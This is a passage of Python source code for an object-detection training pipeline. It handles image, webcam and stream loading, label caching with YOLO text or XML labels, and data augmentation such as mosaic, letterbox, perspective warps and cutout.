self.cap = cv2.VideoCapture(path)
self.nframes = int(self.cap.get(cv2.CAP_PROP_FRAME_COUNT))
def __len__(self):
return self.nf # number of files
class LoadWebcam: # for inference
def __init__(self, pipe='0', img_size=640, stride=32):
self.img_size = img_size
self.stride = stride
if pipe.isnumeric():
pipe = eval(pipe) # local camera
# pipe = 'rtsp://192.168.1.64/1' # IP camera
# pipe = 'rtsp://username:password@192.168.1.64/1' # IP camera with login
# pipe = 'http://wmccpinetop.axiscam.net/mjpg/video.mjpg' # IP golf camera
self.pipe = pipe
self.cap = cv2.VideoCapture(pipe) # video capture object
self.cap.set(cv2.CAP_PROP_BUFFERSIZE, 3) # set buffer size
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
if cv2.waitKey(1) == ord('q'): # q to quit
self.cap.release()
cv2.destroyAllWindows()
raise StopIteration
# Read frame
if self.pipe == 0: # local camera
ret_val, img0 = self.cap.read()
img0 = cv2.flip(img0, 1) # flip left-right
else: # IP camera
n = 0
while True:
n += 1
self.cap.grab()
if n % 30 == 0: # skip frames
ret_val, img0 = self.cap.retrieve()
if ret_val:
break
# Print
assert ret_val, f'Camera Error {self.pipe}'
img_path = 'webcam.jpg'
print(f'webcam {self.count}: ', end='')
# Padded resize
img = letterbox(img0, self.img_size, stride=self.stride)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return img_path, img, img0, None
def __len__(self):
return 0
class LoadStreams: # multiple IP or RTSP cameras
def __init__(self, sources='streams.txt', img_size=640, stride=32):
self.mode = 'stream'
self.img_size = img_size
self.stride = stride
if os.path.isfile(sources):
with open(sources, 'r') as f:
sources = [x.strip() for x in f.read().strip().splitlines() if len(x.strip())]
else:
sources = [sources]
n = len(sources)
self.imgs = [None] * n
self.sources = [clean_str(x) for x in sources] # clean source names for later
for i, s in enumerate(sources):
# Start the thread to read frames from the video stream
print(f'{i + 1}/{n}: {s}... ', end='')
cap = cv2.VideoCapture(eval(s) if s.isnumeric() else s)
assert cap.isOpened(), f'Failed to open {s}'
w = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
h = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
fps = cap.get(cv2.CAP_PROP_FPS) % 100
_, self.imgs[i] = cap.read() # guarantee first frame
thread = Thread(target=self.update, args=([i, cap]), daemon=True)
print(f' success ({w}x{h} at {fps:.2f} FPS).')
thread.start()
print('') # newline
# check for common shapes
s = np.stack([letterbox(x, self.img_size, stride=self.stride)[0].shape for x in self.imgs], 0) # shapes
self.rect = np.unique(s, axis=0).shape[0] == 1 # rect inference if all shapes equal
if not self.rect:
print('WARNING: Different stream shapes detected. For optimal performance supply similarly-shaped streams.')
def update(self, index, cap):
# Read next stream frame in a daemon thread
n = 0
while cap.isOpened():
n += 1
# _, self.imgs[index] = cap.read()
cap.grab()
if n == 4: # read every 4th frame
success, im = cap.retrieve()
self.imgs[index] = im if success else self.imgs[index] * 0
n = 0
time.sleep(0.01) # wait time
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
img0 = self.imgs.copy()
if cv2.waitKey(1) == ord('q'): # q to quit
cv2.destroyAllWindows()
raise StopIteration
# Letterbox
img = [letterbox(x, self.img_size, auto=self.rect, stride=self.stride)[0] for x in img0]
# Stack
img = np.stack(img, 0)
# Convert
img = img[:, :, :, ::-1].transpose(0, 3, 1, 2) # BGR to RGB, to bsx3x416x416
img = np.ascontiguousarray(img)
return self.sources, img, img0, None
def __len__(self):
return 0 # 1E12 frames = 32 streams at 30 FPS for 30 years
def img2label_paths(img_paths):
# Define label paths as a function of image paths
# parent = Path(img_paths[0]).parent
# labels_path = img_paths[0].split("\\")[:-2]
# parent.stem = "labels"
# labels_path = parent
sa, sb = os.sep + 'images' + os.sep, os.sep + 'labels' + os.sep # /images/, /labels/ substrings
labels_path_txt = ['txt'.join(x.replace(sa, sb, 1).rsplit(x.split('.')[-1], 1)) for x in img_paths]
labels_path_xml = ['xml'.join(x.replace(sa, sb, 1).rsplit(x.split('.')[-1], 1)) for x in img_paths]
return labels_path_txt
class LoadImagesAndLabels(Dataset): # for training/testing
def __init__(self, path, img_size=640, batch_size=16, augment=False, hyp=None, rect=False, image_weights=False,
cache_images=False, single_cls=False, stride=32, pad=0.0, prefix=''):
self.img_size = img_size
self.augment = augment
self.hyp = hyp
self.image_weights = image_weights
self.rect = False if image_weights else rect
self.mosaic = self.augment and not self.rect # load 4 images at a time into a mosaic (only during training)
self.mosaic_border = [-img_size // 2, -img_size // 2]
self.stride = stride
self.path = path
try:
f = [] # image files
for p in path if isinstance(path, list) else [path]:
p = Path(p) # os-agnostic
if p.is_dir(): # dir
f += glob.glob(str(p / '**' / '*.*'), recursive=True)
# f = list(p.rglob('**/*.*')) # pathlib
elif p.is_file(): # file
with open(p, 'r') as t:
t = t.read().strip().splitlines()
parent = str(p.parent) + os.sep
f += [x.replace('./', parent) if x.startswith('./') else x for x in t] # local to global path
# f += [p.parent / x.lstrip(os.sep) for x in t] # local to global path (pathlib)
else:
raise Exception(f'{prefix}{p} does not exist')
self.img_files = sorted([x.replace('/', os.sep) for x in f if x.split('.')[-1].lower() in img_formats])
# self.img_files = sorted([x for x in f if x.suffix[1:].lower() in img_formats]) # pathlib
assert self.img_files, f'{prefix}No images found'
except Exception as e:
raise Exception(f'{prefix}Error loading data from {path}: {e}\nSee {help_url}')
# Check cache
self.label_files = img2label_paths(self.img_files) # labels
# cache_path = Path("".join([str(Path(self.img_files[0]).parent).split('images')[0], "labels.cache"]))
cache_path = (p if p.is_file() else Path(self.label_files[0]).parent).with_suffix('.cache') # cached labels
if cache_path.is_file():
cache, exists = torch.load(cache_path), True # load
if cache['hash'] != get_hash(self.label_files + self.img_files) or 'version' not in cache: # changed
cache, exists = self.cache_labels(cache_path, prefix), False # re-cache
else:
cache, exists = self.cache_labels(cache_path, prefix), False # cache
# cache, exists = self.new_cache_labels(cache_path, prefix), False
# Display cache
nf, nm, ne, nc, n = cache.pop('results') # found, missing, empty, corrupted, total
if exists:
d = f"Scanning '{cache_path}' images and labels... {nf} found, {nm} missing, {ne} empty, {nc} corrupted"
tqdm(None, desc=prefix + d, total=n, initial=n) # display cache results
assert nf > 0 or not augment, f'{prefix}No labels in {cache_path}. Can not train without labels. See {help_url}'
# Read cache
cache.pop('hash') # remove hash
cache.pop('version') # remove version
labels, shapes, self.segments = zip(*cache.values())
self.labels = list(labels)
self.shapes = np.array(shapes, dtype=np.float64)
self.img_files = list(cache.keys()) # update
self.label_files = img2label_paths(cache.keys()) # update
if single_cls:
for x in self.labels:
x[:, 0] = 0
n = len(shapes) # number of images
bi = np.floor(np.arange(n) / batch_size).astype(np.int) # batch index
nb = bi[-1] + 1 # number of batches
self.batch = bi # batch index of image
self.n = n
self.indices = range(n)
# Rectangular Training
if self.rect:
# Sort by aspect ratio
s = self.shapes # wh
ar = s[:, 1] / s[:, 0] # aspect ratio
irect = ar.argsort()
self.img_files = [self.img_files[i] for i in irect]
self.label_files = [self.label_files[i] for i in irect]
self.labels = [self.labels[i] for i in irect]
self.shapes = s[irect] # wh
ar = ar[irect]
# Set training image shapes
shapes = [[1, 1]] * nb
for i in range(nb):
ari = ar[bi == i]
mini, maxi = ari.min(), ari.max()
if maxi < 1:
shapes[i] = [maxi, 1]
elif mini > 1:
shapes[i] = [1, 1 / mini]
self.batch_shapes = np.ceil(np.array(shapes) * img_size / stride + pad).astype(np.int) * stride
# Cache images into memory for faster training (WARNING: large datasets may exceed system RAM)
self.imgs = [None] * n
if cache_images:
gb = 0 # Gigabytes of cached images
self.img_hw0, self.img_hw = [None] * n, [None] * n
results = ThreadPool(8).imap(lambda x: load_image(*x), zip(repeat(self), range(n))) # 8 threads
pbar = tqdm(enumerate(results), total=n)
for i, x in pbar:
self.imgs[i], self.img_hw0[i], self.img_hw[i] = x # img, hw_original, hw_resized = load_image(self, i)
gb += self.imgs[i].nbytes
pbar.desc = f'{prefix}Caching images ({gb / 1E9:.1f}GB)'
def cache_labels(self, path=Path('./labels.cache'), prefix=''):
# Cache dataset labels, check images and read shapes
x = {} # dict
nm, nf, ne, nc = 0, 0, 0, 0 # number missing, found, empty, duplicate
pbar = tqdm(zip(self.img_files, self.label_files), desc='Scanning images', total=len(self.img_files))
for i, (im_file, lb_file) in enumerate(pbar):
try:
# verify images
im = Image.open(im_file)
im.verify() # PIL verify
shape = exif_size(im) # image size
segments = [] # instance segments
assert (shape[0] > 9) & (shape[1] > 9), f'image size {shape} <10 pixels'
assert im.format.lower() in img_formats, f'invalid image format {im.format}'
# verify labels
if os.path.isfile(lb_file):
nf += 1 # label found
with open(lb_file, 'r') as f:
l = [x.split() for x in f.read().strip().splitlines()]
if any([len(x) > 8 for x in l]): # is segment
classes = np.array([x[0] for x in l], dtype=np.float32)
segments = [np.array(x[1:], dtype=np.float32).reshape(-1, 2) for x in l] # (cls, xy1...)
l = np.concatenate((classes.reshape(-1, 1), segments2boxes(segments)), 1) # (cls, xywh)
l = np.array(l, dtype=np.float32)
if len(l):
assert l.shape[1] == 5, 'labels require 5 columns each'
assert (l >= 0).all(), 'negative labels'
assert (l[:, 1:] <= 1).all(), 'non-normalized or out of bounds coordinate labels'
assert np.unique(l, axis=0).shape[0] == l.shape[0], 'duplicate labels'
else:
ne += 1 # label empty
l = np.zeros((0, 5), dtype=np.float32)
else:
nm += 1 # label missing
l = np.zeros((0, 5), dtype=np.float32)
x[im_file] = [l, shape, segments]
except Exception as e:
nc += 1
print(f'{prefix}WARNING: Ignoring corrupted image and/or label {im_file}: {e}')
pbar.desc = f"{prefix}Scanning '{path.parent / path.stem}' images and labels... " \
f"{nf} found, {nm} missing, {ne} empty, {nc} corrupted"
if nf == 0:
print(f'{prefix}WARNING: No labels found in {path}. See {help_url}')
x['hash'] = get_hash(self.label_files + self.img_files)
x['results'] = nf, nm, ne, nc, i + 1
x['version'] = 0.1 # cache version
torch.save(x, path) # save for next time
logging.info(f'{prefix}New cache created: {path}')
return x
def new_cache_labels(self, path=Path('./labels.cache'), prefix=''):
# Cache dataset labels, check images and read shapes
x = {} # dict
nm, nf, ne, nc = 0, 0, 0, 0 # number missing, found, empty, duplicate
pbar = tqdm(zip(self.img_files, self.label_files), desc='Scanning images', total=len(self.img_files))
for i, (im_file, lb_file) in enumerate(pbar):
try:
# verify images
im = Image.open(im_file)
im.verify() # PIL verify
shape = exif_size(im) # image size
segments = [] # instance segments
assert (shape[0] > 9) & (shape[1] > 9), f'image size {shape} <10 pixels'
assert im.format.lower() in img_formats, f'invalid image format {im.format}'
# verify labels
if os.path.isfile(lb_file):
nf += 1 # label found
if lb_file.split(".")[-1] == "xml":
# with open(lb_file, 'r') as f:
l = xml2txt(lb_file, lb_file)
# l = [x.split() for x in f.read().strip().splitlines()]
if any([len(x) > 8 for x in l]): # is segment
classes = np.array([x[0] for x in l], dtype=np.float32)
segments = [np.array(x[1:], dtype=np.float32).reshape(-1, 2) for x in l] # (cls, xy1...)
l = np.concatenate((classes.reshape(-1, 1), segments2boxes(segments)), 1) # (cls, xywh)
l = np.array(l, dtype=np.float32)
if len(l):
assert l.shape[1] == 5, 'labels require 5 columns each'
assert (l >= 0).all(), 'negative labels'
assert (l[:, 1:] <= 1).all(), 'non-normalized or out of bounds coordinate labels'
assert np.unique(l, axis=0).shape[0] == l.shape[0], 'duplicate labels'
else:
ne += 1 # label empty
l = np.zeros((0, 5), dtype=np.float32)
else:
nm += 1 # label missing
l = np.zeros((0, 5), dtype=np.float32)
x[im_file] = [l, shape, segments]
except Exception as e:
nc += 1
print(f'{prefix}WARNING: Ignoring corrupted image and/or label {im_file}: {e}')
pbar.desc = f"{prefix}Scanning '{path.parent / path.stem}' images and labels... " \
f"{nf} found, {nm} missing, {ne} empty, {nc} corrupted"
if nf == 0:
print(f'{prefix}WARNING: No labels found in {path}. See {help_url}')
x['hash'] = get_hash(self.label_files + self.img_files)
x['results'] = nf, nm, ne, nc, i + 1
x['version'] = 0.1 # cache version
torch.save(x, path) # save for next time
logging.info(f'{prefix}New cache created: {path}')
return x
def __len__(self):
return len(self.img_files)
# def __iter__(self):
# self.count = -1
# print('ran dataset iter')
# #self.shuffled_vector = np.random.permutation(self.nF) if self.augment else np.arange(self.nF)
# return self
def __getitem__(self, index):
index = self.indices[index] # linear, shuffled, or image_weights
hyp = self.hyp
mosaic = self.mosaic and random.random() < hyp['mosaic']
if mosaic:
# Load mosaic
img, labels = load_mosaic(self, index)
shapes = None
# MixUp https://arxiv.org/pdf/1710.09412.pdf
if random.random() < hyp['mixup']:
img2, labels2 = load_mosaic(self, random.randint(0, self.n - 1))
r = np.random.beta(8.0, 8.0) # mixup ratio, alpha=beta=8.0
img = (img * r + img2 * (1 - r)).astype(np.uint8)
labels = np.concatenate((labels, labels2), 0)
else:
# Load image
img, (h0, w0), (h, w) = load_image(self, index)
# Letterbox
shape = self.batch_shapes[self.batch[index]] if self.rect else self.img_size # final letterboxed shape
img, ratio, pad = letterbox(img, shape, auto=False, scaleup=self.augment)
shapes = (h0, w0), ((h / h0, w / w0), pad) # for COCO mAP rescaling
labels = self.labels[index].copy()
if labels.size: # normalized xywh to pixel xyxy format
labels[:, 1:] = xywhn2xyxy(labels[:, 1:], ratio[0] * w, ratio[1] * h, padw=pad[0], padh=pad[1])
if self.augment:
# Augment imagespace
if not mosaic:
img, labels = random_perspective(img, labels,
degrees=hyp['degrees'],
translate=hyp['translate'],
scale=hyp['scale'],
shear=hyp['shear'],
perspective=hyp['perspective'])
# Augment colorspace
augment_hsv(img, hgain=hyp['hsv_h'], sgain=hyp['hsv_s'], vgain=hyp['hsv_v'])
# Apply cutouts
# if random.random() < 0.9:
# labels = cutout(img, labels)
nL = len(labels) # number of labels
if nL:
labels[:, 1:5] = xyxy2xywh(labels[:, 1:5]) # convert xyxy to xywh
labels[:, [2, 4]] /= img.shape[0] # normalized height 0-1
labels[:, [1, 3]] /= img.shape[1] # normalized width 0-1
if self.augment:
# flip up-down
if random.random() < hyp['flipud']:
img = np.flipud(img)
if nL:
labels[:, 2] = 1 - labels[:, 2]
# flip left-right
if random.random() < hyp['fliplr']:
img = np.fliplr(img)
if nL:
labels[:, 1] = 1 - labels[:, 1]
labels_out = torch.zeros((nL, 6))
if nL:
labels_out[:, 1:] = torch.from_numpy(labels)
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return torch.from_numpy(img), labels_out, self.img_files[index], shapes
@staticmethod
def collate_fn(batch):
img, label, path, shapes = zip(*batch) # transposed
for i, l in enumerate(label):
l[:, 0] = i # add target image index for build_targets()
return torch.stack(img, 0), torch.cat(label, 0), path, shapes
@staticmethod
def collate_fn4(batch):
img, label, path, shapes = zip(*batch) # transposed
n = len(shapes) // 4
img4, label4, path4, shapes4 = [], [], path[:n], shapes[:n]
ho = torch.tensor([[0., 0, 0, 1, 0, 0]])
wo = torch.tensor([[0., 0, 1, 0, 0, 0]])
s = torch.tensor([[1, 1, .5, .5, .5, .5]]) # scale
for i in range(n): # zidane torch.zeros(16,3,720,1280) # BCHW
i *= 4
if random.random() < 0.5:
im = F.interpolate(img[i].unsqueeze(0).float(), scale_factor=2., mode='bilinear', align_corners=False)[
0].type(img[i].type())
l = label[i]
else:
im = torch.cat((torch.cat((img[i], img[i + 1]), 1), torch.cat((img[i + 2], img[i + 3]), 1)), 2)
l = torch.cat((label[i], label[i + 1] + ho, label[i + 2] + wo, label[i + 3] + ho + wo), 0) * s
img4.append(im)
label4.append(l)
for i, l in enumerate(label4):
l[:, 0] = i # add target image index for build_targets()
return torch.stack(img4, 0), torch.cat(label4, 0), path4, shapes4
# Ancillary functions --------------------------------------------------------------------------------------------------
def load_image(self, index):
# loads 1 image from dataset, returns img, original hw, resized hw
img = self.imgs[index]
if img is None: # not cached
path = self.img_files[index]
img = cv2.imread(path) # BGR
assert img is not None, 'Image Not Found ' + path
h0, w0 = img.shape[:2] # orig hw
r = self.img_size / max(h0, w0) # resize image to img_size
if r != 1: # always resize down, only resize up if training with augmentation
interp = cv2.INTER_AREA if r < 1 and not self.augment else cv2.INTER_LINEAR
img = cv2.resize(img, (int(w0 * r), int(h0 * r)), interpolation=interp)
return img, (h0, w0), img.shape[:2] # img, hw_original, hw_resized
else:
return self.imgs[index], self.img_hw0[index], self.img_hw[index] # img, hw_original, hw_resized
def augment_hsv(img, hgain=0.5, sgain=0.5, vgain=0.5):
r = np.random.uniform(-1, 1, 3) * [hgain, sgain, vgain] + 1 # random gains
hue, sat, val = cv2.split(cv2.cvtColor(img, cv2.COLOR_BGR2HSV))
dtype = img.dtype # uint8
x = np.arange(0, 256, dtype=np.int16)
lut_hue = ((x * r[0]) % 180).astype(dtype)
lut_sat = np.clip(x * r[1], 0, 255).astype(dtype)
lut_val = np.clip(x * r[2], 0, 255).astype(dtype)
img_hsv = cv2.merge((cv2.LUT(hue, lut_hue), cv2.LUT(sat, lut_sat), cv2.LUT(val, lut_val))).astype(dtype)
cv2.cvtColor(img_hsv, cv2.COLOR_HSV2BGR, dst=img) # no return needed
def hist_equalize(img, clahe=True, bgr=False):
# Equalize histogram on BGR image 'img' with img.shape(n,m,3) and range 0-255
yuv = cv2.cvtColor(img, cv2.COLOR_BGR2YUV if bgr else cv2.COLOR_RGB2YUV)
if clahe:
c = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(8, 8))
yuv[:, :, 0] = c.apply(yuv[:, :, 0])
else:
yuv[:, :, 0] = cv2.equalizeHist(yuv[:, :, 0]) # equalize Y channel histogram
return cv2.cvtColor(yuv, cv2.COLOR_YUV2BGR if bgr else cv2.COLOR_YUV2RGB) # convert YUV image to RGB
def load_mosaic(self, index):
# loads images in a 4-mosaic
labels4, segments4 = [], []
s = self.img_size
yc, xc = [int(random.uniform(-x, 2 * s + x)) for x in self.mosaic_border] # mosaic center x, y
indices = [index] + random.choices(self.indices, k=3) # 3 additional image indices
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = load_image(self, index)
# place img in img4
if i == 0: # top left
img4 = np.full((s * 2, s * 2, img.shape[2]), 114, dtype=np.uint8) # base image with 4 tiles
x1a, y1a, x2a, y2a = max(xc - w, 0), max(yc - h, 0), xc, yc # xmin, ymin, xmax, ymax (large image)
x1b, y1b, x2b, y2b = w - (x2a - x1a), h - (y2a - y1a), w, h # xmin, ymin, xmax, ymax (small image)
elif i == 1: # top right
x1a, y1a, x2a, y2a = xc, max(yc - h, 0), min(xc + w, s * 2), yc
x1b, y1b, x2b, y2b = 0, h - (y2a - y1a), min(w, x2a - x1a), h
elif i == 2: # bottom left
x1a, y1a, x2a, y2a = max(xc - w, 0), yc, xc, min(s * 2, yc + h)
x1b, y1b, x2b, y2b = w - (x2a - x1a), 0, w, min(y2a - y1a, h)
elif i == 3: # bottom right
x1a, y1a, x2a, y2a = xc, yc, min(xc + w, s * 2), min(s * 2, yc + h)
x1b, y1b, x2b, y2b = 0, 0, min(w, x2a - x1a), min(y2a - y1a, h)
img4[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
padw = x1a - x1b
padh = y1a - y1b
# Labels
labels, segments = self.labels[index].copy(), self.segments[index].copy()
if labels.size:
labels[:, 1:] = xywhn2xyxy(labels[:, 1:], w, h, padw, padh) # normalized xywh to pixel xyxy format
segments = [xyn2xy(x, w, h, padw, padh) for x in segments]
labels4.append(labels)
segments4.extend(segments)
# Concat/clip labels
labels4 = np.concatenate(labels4, 0)
for x in (labels4[:, 1:], *segments4):
np.clip(x, 0, 2 * s, out=x) # clip when using random_perspective()
# img4, labels4 = replicate(img4, labels4) # replicate
# Augment
img4, labels4 = random_perspective(img4, labels4, segments4,
degrees=self.hyp['degrees'],
translate=self.hyp['translate'],
scale=self.hyp['scale'],
shear=self.hyp['shear'],
perspective=self.hyp['perspective'],
border=self.mosaic_border) # border to remove
return img4, labels4
def load_mosaic9(self, index):
# loads images in a 9-mosaic
labels9, segments9 = [], []
s = self.img_size
indices = [index] + random.choices(self.indices, k=8) # 8 additional image indices
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = load_image(self, index)
# place img in img9
if i == 0: # center
img9 = np.full((s * 3, s * 3, img.shape[2]), 114, dtype=np.uint8) # base image with 4 tiles
h0, w0 = h, w
c = s, s, s + w, s + h # xmin, ymin, xmax, ymax (base) coordinates
elif i == 1: # top
c = s, s - h, s + w, s
elif i == 2: # top right
c = s + wp, s - h, s + wp + w, s
elif i == 3: # right
c = s + w0, s, s + w0 + w, s + h
elif i == 4: # bottom right
c = s + w0, s + hp, s + w0 + w, s + hp + h
elif i == 5: # bottom
c = s + w0 - w, s + h0, s + w0, s + h0 + h
elif i == 6: # bottom left
c = s + w0 - wp - w, s + h0, s + w0 - wp, s + h0 + h
elif i == 7: # left
c = s - w, s + h0 - h, s, s + h0
elif i == 8: # top left
c = s - w, s + h0 - hp - h, s, s + h0 - hp
padx, pady = c[:2]
x1, y1, x2, y2 = [max(x, 0) for x in c] # allocate coords
# Labels
labels, segments = self.labels[index].copy(), self.segments[index].copy()
if labels.size:
labels[:, 1:] = xywhn2xyxy(labels[:, 1:], w, h, padx, pady) # normalized xywh to pixel xyxy format
segments = [xyn2xy(x, w, h, padx, pady) for x in segments]
labels9.append(labels)
segments9.extend(segments)
# Image
img9[y1:y2, x1:x2] = img[y1 - pady:, x1 - padx:] # img9[ymin:ymax, xmin:xmax]
hp, wp = h, w # height, width previous
# Offset
yc, xc = [int(random.uniform(0, s)) for _ in self.mosaic_border] # mosaic center x, y
img9 = img9[yc:yc + 2 * s, xc:xc + 2 * s]
# Concat/clip labels
labels9 = np.concatenate(labels9, 0)
labels9[:, [1, 3]] -= xc
labels9[:, [2, 4]] -= yc
c = np.array([xc, yc]) # centers
segments9 = [x - c for x in segments9]
for x in (labels9[:, 1:], *segments9):
np.clip(x, 0, 2 * s, out=x) # clip when using random_perspective()
# img9, labels9 = replicate(img9, labels9) # replicate
# Augment
img9, labels9 = random_perspective(img9, labels9, segments9,
degrees=self.hyp['degrees'],
translate=self.hyp['translate'],
scale=self.hyp['scale'],
shear=self.hyp['shear'],
perspective=self.hyp['perspective'],
border=self.mosaic_border) # border to remove
return img9, labels9
def replicate(img, labels):
# Replicate labels
h, w = img.shape[:2]
boxes = labels[:, 1:].astype(int)
x1, y1, x2, y2 = boxes.T
s = ((x2 - x1) + (y2 - y1)) / 2 # side length (pixels)
for i in s.argsort()[:round(s.size * 0.5)]: # smallest indices
x1b, y1b, x2b, y2b = boxes[i]
bh, bw = y2b - y1b, x2b - x1b
yc, xc = int(random.uniform(0, h - bh)), int(random.uniform(0, w - bw)) # offset x, y
x1a, y1a, x2a, y2a = [xc, yc, xc + bw, yc + bh]
img[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
labels = np.append(labels, [[labels[i, 0], x1a, y1a, x2a, y2a]], axis=0)
return img, labels
def letterbox(img, new_shape=(640, 640), color=(114, 114, 114), auto=True, scaleFill=False, scaleup=True, stride=32):
# Resize and pad image while meeting stride-multiple constraints
shape = img.shape[:2] # current shape [height, width]
if isinstance(new_shape, int):
new_shape = (new_shape, new_shape)
# Scale ratio (new / old)
r = min(new_shape[0] / shape[0], new_shape[1] / shape[1])
if not scaleup: # only scale down, do not scale up (for better test mAP)
r = min(r, 1.0)
# Compute padding
ratio = r, r # width, height ratios
new_unpad = int(round(shape[1] * r)), int(round(shape[0] * r))
dw, dh = new_shape[1] - new_unpad[0], new_shape[0] - new_unpad[1] # wh padding
if auto: # minimum rectangle
dw, dh = np.mod(dw, stride), np.mod(dh, stride) # wh padding
elif scaleFill: # stretch
dw, dh = 0.0, 0.0
new_unpad = (new_shape[1], new_shape[0])
ratio = new_shape[1] / shape[1], new_shape[0] / shape[0] # width, height ratios
dw /= 2 # divide padding into 2 sides
dh /= 2
if shape[::-1] != new_unpad: # resize
img = cv2.resize(img, new_unpad, interpolation=cv2.INTER_LINEAR)
top, bottom = int(round(dh - 0.1)), int(round(dh + 0.1))
left, right = int(round(dw - 0.1)), int(round(dw + 0.1))
img = cv2.copyMakeBorder(img, top, bottom, left, right, cv2.BORDER_CONSTANT, value=color) # add border
return img, ratio, (dw, dh)
def random_perspective(img, targets=(), segments=(), degrees=10, translate=.1, scale=.1, shear=10, perspective=0.0,
border=(0, 0)):
# torchvision.transforms.RandomAffine(degrees=(-10, 10), translate=(.1, .1), scale=(.9, 1.1), shear=(-10, 10))
# targets = [cls, xyxy]
height = img.shape[0] + border[0] * 2 # shape(h,w,c)
width = img.shape[1] + border[1] * 2
# Center
C = np.eye(3)
C[0, 2] = -img.shape[1] / 2 # x translation (pixels)
C[1, 2] = -img.shape[0] / 2 # y translation (pixels)
# Perspective
P = np.eye(3)
P[2, 0] = random.uniform(-perspective, perspective) # x perspective (about y)
P[2, 1] = random.uniform(-perspective, perspective) # y perspective (about x)
# Rotation and Scale
R = np.eye(3)
a = random.uniform(-degrees, degrees)
# a += random.choice([-180, -90, 0, 90]) # add 90deg rotations to small rotations
s = random.uniform(1 - scale, 1 + scale)
# s = 2 ** random.uniform(-scale, scale)
R[:2] = cv2.getRotationMatrix2D(angle=a, center=(0, 0), scale=s)
# Shear
S = np.eye(3)
S[0, 1] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # x shear (deg)
S[1, 0] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # y shear (deg)
# Translation
T = np.eye(3)
T[0, 2] = random.uniform(0.5 - translate, 0.5 + translate) * width # x translation (pixels)
T[1, 2] = random.uniform(0.5 - translate, 0.5 + translate) * height # y translation (pixels)
# Combined rotation matrix
M = T @ S @ R @ P @ C # order of operations (right to left) is IMPORTANT
if (border[0] != 0) or (border[1] != 0) or (M != np.eye(3)).any(): # image changed
if perspective:
img = cv2.warpPerspective(img, M, dsize=(width, height), borderValue=(114, 114, 114))
else: # affine
img = cv2.warpAffine(img, M[:2], dsize=(width, height), borderValue=(114, 114, 114))
# Visualize
# import matplotlib.pyplot as plt
# ax = plt.subplots(1, 2, figsize=(12, 6))[1].ravel()
# ax[0].imshow(img[:, :, ::-1]) # base
# ax[1].imshow(img2[:, :, ::-1]) # warped
# Transform label coordinates
n = len(targets)
if n:
use_segments = any(x.any() for x in segments)
new = np.zeros((n, 4))
if use_segments: # warp segments
segments = resample_segments(segments) # upsample
for i, segment in enumerate(segments):
xy = np.ones((len(segment), 3))
xy[:, :2] = segment
xy = xy @ M.T # transform
xy = xy[:, :2] / xy[:, 2:3] if perspective else xy[:, :2] # perspective rescale or affine
# clip
new[i] = segment2box(xy, width, height)
else: # warp boxes
xy = np.ones((n * 4, 3))
xy[:, :2] = targets[:, [1, 2, 3, 4, 1, 4, 3, 2]].reshape(n * 4, 2) # x1y1, x2y2, x1y2, x2y1
xy = xy @ M.T # transform
xy = (xy[:, :2] / xy[:, 2:3] if perspective else xy[:, :2]).reshape(n, 8) # perspective rescale or affine
# create new boxes
x = xy[:, [0, 2, 4, 6]]
y = xy[:, [1, 3, 5, 7]]
new = np.concatenate((x.min(1), y.min(1), x.max(1), y.max(1))).reshape(4, n).T
# clip
new[:, [0, 2]] = new[:, [0, 2]].clip(0, width)
new[:, [1, 3]] = new[:, [1, 3]].clip(0, height)
# filter candidates
i = box_candidates(box1=targets[:, 1:5].T * s, box2=new.T, area_thr=0.01 if use_segments else 0.10)
targets = targets[i]
targets[:, 1:5] = new[i]
return img, targets
def box_candidates(box1, box2, wh_thr=2, ar_thr=20, area_thr=0.1, eps=1e-16): # box1(4,n), box2(4,n)
# Compute candidate boxes: box1 before augment, box2 after augment, wh_thr (pixels), aspect_ratio_thr, area_ratio
w1, h1 = box1[2] - box1[0], box1[3] - box1[1]
w2, h2 = box2[2] - box2[0], box2[3] - box2[1]
ar = np.maximum(w2 / (h2 + eps), h2 / (w2 + eps)) # aspect ratio
return (w2 > wh_thr) & (h2 > wh_thr) & (w2 * h2 / (w1 * h1 + eps) > area_thr) & (ar < ar_thr) # candidates
def cutout(image, labels):
# Applies image cutout augmentation https://arxiv.org/abs/1708.04552
h, w = image.shape[:2]
def bbox_ioa(box1, box2):
# Returns the intersection over box2 area given box1, box2. box1 is 4, box2 is nx4. boxes are x1y1x2y2
box2 = box2.transpose()
# Get the coordinates of bounding boxes
b1_x1, b1_y1, b1_x2, b1_y2 = box1[0], box1[1], box1[2], box1[3]
b2_x1, b2_y1, b2_x2, b2_y2 = box2[0], box2[1], box2[2], box2[3]
# Intersection area
inter_area = (np.minimum(b1_x2, b2_x2) - np.maximum(b1_x1, b2_x1)).clip(0) * \
(np.minimum(b1_y2, b2_y2) - np.maximum(b1_y1, b2_y1)).clip(0)
# box2 area
box2_area = (b2_x2 - b2_x1) * (b2_y2 - b2_y1) + 1e-16
# Intersection over box2 area
return inter_area / box2_area
# create random masks
scales = [0.5] * 1 + [0.25] * 2 + [0.125] * 4 + [0.0625] * 8 + [0.03125] * 16 # image size fraction
for s in scales:
mask_h = random.randint(1, int(h * s))
mask_w = random.randint(1, int(w * s))
# box
xmin = max(0, random.randint(0, w) - mask_w // 2)
ymin = max(0, random.randint(0, h) - mask_h // 2)
xmax = min(w, xmin + mask_w)
ymax = min(h, ymin + mask_h)
# apply random color mask
image[ymin:ymax, xmin:xmax] = [random.randint(64, 191) for _ in range(3)]
# return unobscured labels
if len(labels) and s > 0.03:
box = np.array([xmin, ymin, xmax, ymax], dtype=np.float32)
ioa = bbox_ioa(box, labels[:, 1:5]) # intersection over area
labels = labels[ioa < 0.60] # remove >60% obscured labels
return labels
def create_folder(path='./new'):
# Create folder
if os.path.exists(path):
